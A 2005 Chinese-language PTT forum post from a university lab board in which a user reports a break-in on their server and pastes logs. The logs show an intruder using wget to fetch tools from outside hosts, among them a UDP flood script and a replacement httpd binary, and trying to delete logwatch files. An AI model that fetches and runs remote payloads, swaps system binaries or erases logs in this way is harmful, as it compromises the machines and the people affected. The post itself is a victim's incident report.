看板 NTUGIEE_EDA 關於我們 聯絡資訊
作者Donnie ( XD)
看板NTUGIEE_EDA
標題Re: eda.ee
時間Tue Mar 29 11:15:17 2005
※ 引述《Donnie ( XD)》之銘言: : ※ 引述《Donnie ( XD)》之銘言: : : 我早上到學校,想看是什麼 process 在搞鬼..... : : 可是被 fish 重開機了 XD : 確定我們的電腦遭受攻擊! 第一次攻擊: Mar 24 05:40:08 已經成功入侵 下載 http://members.lycos.co.uk/cutegirlrulez/modlib --05:40:08-- http://members.lycos.co.uk/cutegirlrulez/modlib => `modlib' Resolving members.lycos.co.uk... 212.78.204.20 Connecting to members.lycos.co.uk[212.78.204.20]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 36,037 [text/plain] 0K .......... .......... .......... ..... 100% 28.0K 接著想要刪除 logwatch rm: cannot remove `logwatch.XX4h0y7I': Operation not permitted rm: cannot remove `logwatch.XXZPy8si': Operation not permitted rm: cannot remove `logwatch.XXyBBEhX': Operation not permitted sh: line 1: cd: /tmp/...: No such file or directory sh: line 1: ./udp.pl: No such file or directory udp.pl: no process killed udp.pl: no process killed cat: sun.pl: No such file or directory ls: /tmp/hat: No such file or directory ls: /tmp/ps: No such file or directory cat: ps.pid: No such file or directory sh: line 1: ./root: No such file or directory --08:22:40-- http://www.packetstormsecurity.nl/DoS/udp.pl => `udp.pl' Resolving www.packetstormsecurity.nl... 213.206.75.252 Connecting to www.packetstormsecurity.nl[213.206.75.252]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,089 [text/plain] 0K . 100% 08:22:41 (10.39 MB/s) - `udp.pl' saved [1089/1089] udp.pl: no process killed [Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 32450 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 300 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 2596 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 476 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 19310 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18911 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18912 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 31070 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 32450 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 300 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 2596 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 476 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 19310 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18911 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18912 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 31070 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 32450 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 300 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 2596 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 476 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 19310 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 18911 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 18912 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 12729 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 31206 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 18913 still did not exit, sending a SIGTERM [Sun Mar 27 15:02:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec) 要取得 root 權限了!! [Sun Mar 27 14:57:31 2005] [warn] child process 12729 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 31206 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:31 2005] [warn] child process 18913 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 31070 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 32450 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 300 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 2596 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 476 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 19310 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 18911 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 18912 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 12729 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 31206 still did not exit, sending a SIGTERM [Sun Mar 27 14:57:33 2005] [warn] child process 18913 still did not exit, sending a SIGTERM [Sun Mar 27 15:02:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec) [Sun Mar 27 15:02:32 2005] [notice] Digest: generating secret for digest authentication ... [Sun Mar 27 15:02:32 2005] [notice] Digest: done [Sun Mar 27 15:02:33 2005] [notice] Apache-AdvancedExtranetServer/2.0.48 (Mandrake Linux/6mdk) mod_perl/1.99_11 Perl/v5.8.3 mod_ssl/2.0.48 OpenSSL/0.9.7c PHP/4.3.4 configured -- resuming normal operations [Sun Mar 27 15:06:32 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/apache2-suexec) [Sun Mar 27 15:06:32 2005] [notice] Digest: generating secret for digest authentication ... [Sun Mar 27 15:06:32 2005] [notice] Digest: done 換掉 apache! --01:09:42-- http://luksuss.republika.pl/httpd => `httpd' Resolving luksuss.republika.pl... 213.180.128.160 Connecting to luksuss.republika.pl[213.180.128.160]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 36,040 [text/plain] 0K .......... .......... .......... ..... 100% 16.1K 01:09:46 (16.13 KB/s) - `httpd' saved [36040/36040] 我要查查是什麼漏洞 還好我們有FW,不然可能更慘! -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 140.112.48.60